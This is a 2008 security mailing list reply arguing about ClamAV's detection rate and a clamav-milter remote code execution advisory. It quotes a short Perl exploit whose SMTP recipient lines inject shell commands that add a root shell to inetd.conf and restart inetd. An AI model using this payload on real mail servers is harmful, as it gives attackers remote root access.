Security Incidents mailing list archives
Re: Possible Mail server compromise ?
From: Eygene Ryabinkin <rea-sec () codelabs ru>
Date: Wed, 20 Feb 2008 17:48:10 +0300
Faas, good day. Tue, Feb 19, 2008 at 07:46:35PM +0100, Faas M. Mathiasen wrote:
ClamAV ? Lowest detection rate in the industry,
Possibly... Where is the statistics?
no on-access scans
Not relevant to the mail scanning engine.
and an Anti-virus that was vulnerable to such bugs [1]
Not the ClamAV itself, but clamav-milter in the blackhole mode. http://www.nruns.com/advisories/[n.runs-SA-2007.025%5D%20-%20ClamAV%20Remote%20Code%20Execution%20Advisory.txt
you consider a great success ? I don't know who you are protecting but I hope they were not vulnerable to this : [1] print $sock "ehlo you\r\n"; print $sock "mail from: <>\r\n"; print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"; print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"; print $sock "data\r\n.\r\nquit\r\n";
-- Eygene
Current thread:
- Re: Possible Mail server compromise ?, (continued)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 04)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 12)
- Re: Possible Mail server compromise ? Michael Loftis (Feb 13)
- Re: Possible Mail server compromise ? Jon Oberheide (Feb 13)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 19)
- Re: Possible Mail server compromise ? Bob Toxen (Feb 19)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 19)
- Re: Possible Mail server compromise ? Valdis . Kletnieks (Feb 20)
- Re: Possible Mail server compromise ? Bob Toxen (Feb 20)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 20)
- Re: Possible Mail server compromise ? Eygene Ryabinkin (Feb 20)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 20)
- Re: Possible Mail server compromise ? Valdis . Kletnieks (Feb 20)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 21)
- Re: Possible Mail server compromise ? Paul Schmehl (Feb 21)
- Re: Possible Mail server compromise ? Jon Oberheide (Feb 20)
- Re: Possible Mail server compromise ? Valdis . Kletnieks (Feb 20)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 20)
- Re: Possible Mail server compromise ? Peter Kosinar (Feb 20)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 21)
- RE: Possible Mail server compromise ? Richard C Lewis (Feb 22)